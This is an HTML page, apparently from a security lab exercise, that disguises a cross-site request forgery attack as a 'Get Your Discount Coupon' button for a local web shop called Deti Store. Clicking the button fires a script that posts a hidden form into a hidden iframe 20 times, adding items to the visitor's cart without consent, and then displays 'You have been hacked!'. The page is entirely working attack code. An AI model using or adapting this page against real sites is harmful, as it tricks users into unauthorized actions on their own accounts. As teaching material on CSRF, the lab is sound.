<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Fake Discount Coupon</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f7f7f7;
        margin: 0;
        padding: 0;
      }
      h1 {
        text-align: center;
        color: #333;
        padding: 20px 0;
      }
      p {
        text-align: center;
        color: #777;
      }
      button {
        display: block;
        margin: 20px auto;
        padding: 10px 20px;
        background-color: red;
        color: #fff;
        font-size: 16px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        transition: background-color 0.3s;
      }
      button:hover {
        background-color: white;
        color: red;
        border: 1px solid red;
      }
    </style>
  </head>
  <body>
    <h1>Welcome to Deti Store</h1>
    <p>Click the button below to get your exclusive discount coupon:</p>
    <div>
      <button id="fakeCouponButton" onClick="hack();">
        Get Your Discount Coupon
      </button>
      <form
        hidden
        id="hack"
        target="csrf-frame"
        action="http://127.0.0.1:5000/shop/add_to_cart/1"
        method="POST"
        autocomplete="off"
      ></form>

      <iframe
        hidden
        name="csrf-frame"
        id="frame"
        width="1000px"
        height="1000px"
      ></iframe>
      <div id="warning"></div>
    </div>
    <script>
      var i = 1;

      function hack() {
        if (i <= 20) {
          if (i == 1) {
            document.getElementById("warning").innerHTML =
              "You have been hacked! Your discount coupon is: <b>deti_store_2020</b>";
          }
          document.getElementById("hack").action =
            "http://127.0.0.1:5000/shop/add_to_cart/" + i;
          console.log(document.getElementById("hack").action);
          document.getElementById("hack").submit();
          i++;
          setTimeout(hack, 200); // Aguarde 2 segundos e, em seguida, chame a função novamente
        } else {
          i = 0;
        }
      }
    </script>
  </body>
</html>
